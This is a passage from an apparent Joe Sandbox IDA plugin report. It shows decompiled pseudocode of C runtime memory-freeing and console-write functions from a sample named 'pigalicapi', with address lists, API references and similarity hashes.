                                                                                                                                                                                                                                                    0x00efad18
                                                                                                                                                                                                                                                    0x00efad1f
                                                                                                                                                                                                                                                    0x00efad21
                                                                                                                                                                                                                                                    0x00efad25
                                                                                                                                                                                                                                                    0x00efad2d
                                                                                                                                                                                                                                                    0x00efad34
                                                                                                                                                                                                                                                    0x00efad3a
                                                                                                                                                                                                                                                    0x00efad3b
                                                                                                                                                                                                                                                    0x00efad3b
                                                                                                                                                                                                                                                    0x00efad42
                                                                                                                                                                                                                                                    0x00efad44
                                                                                                                                                                                                                                                    0x00efad49
                                                                                                                                                                                                                                                    0x00efad51
                                                                                                                                                                                                                                                    0x00efad56
                                                                                                                                                                                                                                                    0x00efad57
                                                                                                                                                                                                                                                    0x00efad57
                                                                                                                                                                                                                                                    0x00efad5a
                                                                                                                                                                                                                                                    0x00efad5d
                                                                                                                                                                                                                                                    0x00efad60
                                                                                                                                                                                                                                                    0x00efad63
                                                                                                                                                                                                                                                    0x00efad63
                                                                                                                                                                                                                                                    0x00efad75

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00EFAC70
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBAAF
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBAC1
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBAD3
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBAE5
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBAF7
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBB09
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBB1B
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBB2D
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBB3F
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBB51
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBB63
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBB75
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBA92: _free.LIBCMT ref: 00EFBB87
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFAC65
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: HeapFree.KERNEL32(00000000,00000000,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?), ref: 00EFA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: GetLastError.KERNEL32(?,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?,?), ref: 00EFA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFAC87
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFAC9C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFACA7
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFACC9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFACDC
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFACEA
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFACF5
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFAD2D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFAD34
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFAD51
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFAD69
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                    • Opcode ID: 0b9705c90eab391db6f98c7606cacc9ada20660a4eddfd006d332c0f44dc219c
                                                                                                                                                                                                                                                    • Instruction ID: be18745bc7b64edc57116f4465f6b46b6a867c8ce809e9d592c865458bd6de56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b9705c90eab391db6f98c7606cacc9ada20660a4eddfd006d332c0f44dc219c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01315EB16043089FEB21AE38D905B76B3E8BF10355F1D6839E64DEE591DB31EC409726
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EF9B3C(char _a4) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t26 = _a4;
                                                                                                                                                                                                                                                    				_t52 =  *_a4;
                                                                                                                                                                                                                                                    				if( *_a4 != 0xf47298) {
                                                                                                                                                                                                                                                    					E00EFA6DA(_t52);
                                                                                                                                                                                                                                                    					_t26 = _a4;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                                    				E00EFA6DA( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                                    				_v8 =  &_a4;
                                                                                                                                                                                                                                                    				E00EF9A02(5,  &_v8);
                                                                                                                                                                                                                                                    				_v8 =  &_a4;
                                                                                                                                                                                                                                                    				return E00EF9A52(4,  &_v8);
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x00ef9b42
                                                                                                                                                                                                                                                    0x00ef9b45
                                                                                                                                                                                                                                                    0x00ef9b4d
                                                                                                                                                                                                                                                    0x00ef9b50
                                                                                                                                                                                                                                                    0x00ef9b55
                                                                                                                                                                                                                                                    0x00ef9b58
                                                                                                                                                                                                                                                    0x00ef9b5c
                                                                                                                                                                                                                                                    0x00ef9b67
                                                                                                                                                                                                                                                    0x00ef9b72
                                                                                                                                                                                                                                                    0x00ef9b7d
                                                                                                                                                                                                                                                    0x00ef9b88
                                                                                                                                                                                                                                                    0x00ef9b93
                                                                                                                                                                                                                                                    0x00ef9b9e
                                                                                                                                                                                                                                                    0x00ef9ba9
                                                                                                                                                                                                                                                    0x00ef9bb7
                                                                                                                                                                                                                                                    0x00ef9bbf
                                                                                                                                                                                                                                                    0x00ef9bc8
                                                                                                                                                                                                                                                    0x00ef9bd0
                                                                                                                                                                                                                                                    0x00ef9be4

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9B50
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: HeapFree.KERNEL32(00000000,00000000,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?), ref: 00EFA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: GetLastError.KERNEL32(?,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?,?), ref: 00EFA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9B5C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9B67
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9B72
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9B7D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9B88
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9B93
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9B9E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9BA9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EF9BB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 7336e2cbba1c7326e0395879770f0c2ff7a61ed5e9a059f949953ec9c8da0020
                                                                                                                                                                                                                                                    • Instruction ID: 7bed1932503734864f26de81af77c38d6ac97f0f3bdf51cfc72deb1c713e9607
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7336e2cbba1c7326e0395879770f0c2ff7a61ed5e9a059f949953ec9c8da0020
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC1186B651410CBFCB01EF54C852DE93BA5EF14390B5A91A5FB0C9F222DA31EE51AB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                                    			E00F03221(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed char _v15;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				void _v24;
                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                    				char _v31;
                                                                                                                                                                                                                                                    				void _v32;
                                                                                                                                                                                                                                                    				long _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				signed char* _v52;
                                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                                                                    				signed int _t78;
                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                    				int _t86;
                                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                                    				long _t97;
                                                                                                                                                                                                                                                    				void _t105;
                                                                                                                                                                                                                                                    				void* _t112;
                                                                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                                                                    				signed int _t118;
                                                                                                                                                                                                                                                    				signed char _t123;
                                                                                                                                                                                                                                                    				signed char _t128;
                                                                                                                                                                                                                                                    				intOrPtr _t129;
                                                                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                                                                    				signed char* _t133;
                                                                                                                                                                                                                                                    				intOrPtr* _t135;
                                                                                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                                                                                    				void* _t137;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t78 =  *0xf8dd74; // 0x3af7f1ec
                                                                                                                                                                                                                                                    				_v8 = _t78 ^ _t136;
                                                                                                                                                                                                                                                    				_t80 = _a8;
                                                                                                                                                                                                                                                    				_t118 = _t80 >> 6;
                                                                                                                                                                                                                                                    				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                                                                                                                                                                                    				_t133 = _a12;
                                                                                                                                                                                                                                                    				_v52 = _t133;
                                                                                                                                                                                                                                                    				_v48 = _t118;
                                                                                                                                                                                                                                                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xf8e830 + _t118 * 4)) + _t116 + 0x18));
                                                                                                                                                                                                                                                    				_v40 = _a16 + _t133;
                                                                                                                                                                                                                                                    				_t86 = GetConsoleCP();
                                                                                                                                                                                                                                                    				_t135 = _a4;
                                                                                                                                                                                                                                                    				_v60 = _t86;
                                                                                                                                                                                                                                                    				 *_t135 = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                                                                                                                                                                                    				while(_t133 < _v40) {
                                                                                                                                                                                                                                                    					_v28 = 0;
                                                                                                                                                                                                                                                    					_v31 =  *_t133;
                                                                                                                                                                                                                                                    					_t129 =  *((intOrPtr*)(0xf8e830 + _v48 * 4));
                                                                                                                                                                                                                                                    					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                                                                                                                                                                                    					if((_t123 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                    						if(( *(E00EF9839(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                                    							_push(_t133);
                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							if(_t133 >= _v40) {
                                                                                                                                                                                                                                                    								_t131 = _v48;
                                                                                                                                                                                                                                                    								 *((char*)( *((intOrPtr*)(0xf8e830 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                                                                                                                                                                                    								 *( *((intOrPtr*)(0xf8e830 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xf8e830 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t112 = E00F027F0( &_v28, _t133, 2);
                                                                                                                                                                                                                                                    								_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                    								if(_t112 != 0xffffffff) {
                                                                                                                                                                                                                                                    									_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                    									goto L9;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t128 = _t123 & 0x000000fb;
                                                                                                                                                                                                                                                    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                                                                                                                                                                                    						_push(2);
                                                                                                                                                                                                                                                    						_v15 = _t128;
                                                                                                                                                                                                                                                    						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                                                                                                                                                                                    						_push( &_v16);
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						_push( &_v28);
                                                                                                                                                                                                                                                    						_t94 = E00F027F0();
                                                                                                                                                                                                                                                    						_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                    						if(_t94 != 0xffffffff) {
                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                    							_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                                                                                                                                                                                    							_v56 = _t97;
                                                                                                                                                                                                                                                    							if(_t97 != 0) {
                                                                                                                                                                                                                                                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                    									L19:
                                                                                                                                                                                                                                                    									 *_t135 = GetLastError();
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                                                                                                                                                                                    									if(_v36 >= _v56) {
                                                                                                                                                                                                                                                    										if(_v31 != 0xa) {
                                                                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											_t105 = 0xd;
                                                                                                                                                                                                                                                    											_v32 = _t105;
                                                                                                                                                                                                                                                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												if(_v36 >= 1) {
                                                                                                                                                                                                                                                    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                                                                                                                                                                                    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                    													goto L16;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                                                                    				return E00EFDC5F(_v8 ^ _t136);
                                                                                                                                                                                                                                                    			}


































                                                                                                                                                                                                                                                    0x00f03229
                                                                                                                                                                                                                                                    0x00f03230
                                                                                                                                                                                                                                                    0x00f03233
                                                                                                                                                                                                                                                    0x00f0323b
                                                                                                                                                                                                                                                    0x00f0323f
                                                                                                                                                                                                                                                    0x00f0324b
                                                                                                                                                                                                                                                    0x00f0324e
                                                                                                                                                                                                                                                    0x00f03251
                                                                                                                                                                                                                                                    0x00f03258
                                                                                                                                                                                                                                                    0x00f03260
                                                                                                                                                                                                                                                    0x00f03263
                                                                                                                                                                                                                                                    0x00f03269
                                                                                                                                                                                                                                                    0x00f0326f
                                                                                                                                                                                                                                                    0x00f03274
                                                                                                                                                                                                                                                    0x00f03276
                                                                                                                                                                                                                                                    0x00f03279
                                                                                                                                                                                                                                                    0x00f0327e
                                                                                                                                                                                                                                                    0x00f03288
                                                                                                                                                                                                                                                    0x00f0328f
                                                                                                                                                                                                                                                    0x00f03292
                                                                                                                                                                                                                                                    0x00f03299
                                                                                                                                                                                                                                                    0x00f032a0
                                                                                                                                                                                                                                                    0x00f032cc
                                                                                                                                                                                                                                                    0x00f032f2
                                                                                                                                                                                                                                                    0x00f032f4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f032ce
                                                                                                                                                                                                                                                    0x00f032d1
                                                                                                                                                                                                                                                    0x00f03398
                                                                                                                                                                                                                                                    0x00f033a4
                                                                                                                                                                                                                                                    0x00f033af
                                                                                                                                                                                                                                                    0x00f033b4
                                                                                                                                                                                                                                                    0x00f032d7
                                                                                                                                                                                                                                                    0x00f032de
                                                                                                                                                                                                                                                    0x00f032e3
                                                                                                                                                                                                                                                    0x00f032e9
                                                                                                                                                                                                                                                    0x00f032ef
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f032ef
                                                                                                                                                                                                                                                    0x00f032e9
                                                                                                                                                                                                                                                    0x00f032d1
                                                                                                                                                                                                                                                    0x00f032a2
                                                                                                                                                                                                                                                    0x00f032a6
                                                                                                                                                                                                                                                    0x00f032a9
                                                                                                                                                                                                                                                    0x00f032af
                                                                                                                                                                                                                                                    0x00f032b1
                                                                                                                                                                                                                                                    0x00f032b4
                                                                                                                                                                                                                                                    0x00f032b8
                                                                                                                                                                                                                                                    0x00f032f5
                                                                                                                                                                                                                                                    0x00f032f8
                                                                                                                                                                                                                                                    0x00f032f9
                                                                                                                                                                                                                                                    0x00f032fe
                                                                                                                                                                                                                                                    0x00f03304
                                                                                                                                                                                                                                                    0x00f0330a
                                                                                                                                                                                                                                                    0x00f03319
                                                                                                                                                                                                                                                    0x00f0331f
                                                                                                                                                                                                                                                    0x00f03325
                                                                                                                                                                                                                                                    0x00f0332a
                                                                                                                                                                                                                                                    0x00f03346
                                                                                                                                                                                                                                                    0x00f033b9
                                                                                                                                                                                                                                                    0x00f033bf
                                                                                                                                                                                                                                                    0x00f03348
                                                                                                                                                                                                                                                    0x00f03350
                                                                                                                                                                                                                                                    0x00f03359
                                                                                                                                                                                                                                                    0x00f0335f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f03361
                                                                                                                                                                                                                                                    0x00f03363
                                                                                                                                                                                                                                                    0x00f03366
                                                                                                                                                                                                                                                    0x00f0337f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f03381
                                                                                                                                                                                                                                                    0x00f03385
                                                                                                                                                                                                                                                    0x00f03387
                                                                                                                                                                                                                                                    0x00f0338a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f0338a
                                                                                                                                                                                                                                                    0x00f03385
                                                                                                                                                                                                                                                    0x00f0337f
                                                                                                                                                                                                                                                    0x00f0335f
                                                                                                                                                                                                                                                    0x00f03359
                                                                                                                                                                                                                                                    0x00f03346
                                                                                                                                                                                                                                                    0x00f0332a
                                                                                                                                                                                                                                                    0x00f03304
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f0338d
                                                                                                                                                                                                                                                    0x00f0338d
                                                                                                                                                                                                                                                    0x00f033c1
                                                                                                                                                                                                                                                    0x00f033d3

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F03996,?,00000000,?,00000000,00000000), ref: 00F03263
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00F032DE
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00F032F9
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F0331F
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,00F03996,00000000,?,?,?,?,?,?,?,?,?,00F03996,?), ref: 00F0333E
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00F03996,00000000,?,?,?,?,?,?,?,?,?,00F03996,?), ref: 00F03377
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                    • Opcode ID: 2a85e8207faaed8ba2d743a2b2ba3c2f3ab308c2d219875d8a5f76af204c4f71
                                                                                                                                                                                                                                                    • Instruction ID: 53a496f9673ed200bb1c210010f8b54dada9958f45f5905fb700430e4bfb48b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a85e8207faaed8ba2d743a2b2ba3c2f3ab308c2d219875d8a5f76af204c4f71
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3518F71E002499FCB10CFA8D885BEEBBF8FF09310F14455AE955E7292E7709A41EB61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EFBC35(intOrPtr _a4) {
                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t45 = _a4;
                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45, 7);
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0x1c, 7);
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0x38, 0xc);
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0x68, 0xc);
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0x98, 2);
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0xb4, 7);
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0xd0, 7);
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0xec, 0xc);
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0x11c, 0xc);
                                                                                                                                                                                                                                                    					E00EFBBF9(_t45 + 0x14c, 2);
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                                                                                                                                    					E00EFA6DA( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                                                                                                                                    					return E00EFA6DA( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x00efbc3b
                                                                                                                                                                                                                                                    0x00efbc40
                                                                                                                                                                                                                                                    0x00efbc49
                                                                                                                                                                                                                                                    0x00efbc54
                                                                                                                                                                                                                                                    0x00efbc5f
                                                                                                                                                                                                                                                    0x00efbc6a
                                                                                                                                                                                                                                                    0x00efbc78
                                                                                                                                                                                                                                                    0x00efbc83
                                                                                                                                                                                                                                                    0x00efbc8e
                                                                                                                                                                                                                                                    0x00efbc99
                                                                                                                                                                                                                                                    0x00efbca7
                                                                                                                                                                                                                                                    0x00efbcb5
                                                                                                                                                                                                                                                    0x00efbcc6
                                                                                                                                                                                                                                                    0x00efbcd4
                                                                                                                                                                                                                                                    0x00efbce2
                                                                                                                                                                                                                                                    0x00efbced
                                                                                                                                                                                                                                                    0x00efbcf8
                                                                                                                                                                                                                                                    0x00efbd03
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efbd13
                                                                                                                                                                                                                                                    0x00efbd18

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBBF9: _free.LIBCMT ref: 00EFBC22
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00EFBC83
                                                                                                                                                                                                                                                      • Part of subcall function 00EFA6DA: HeapFree.KERNEL32(00000000,00000000,?,00EFBC27,?,00000000,?,00000000,?,00EFBC4E,?,00000007,?,?,00EFADC4,?), ref: 00EFA6F0
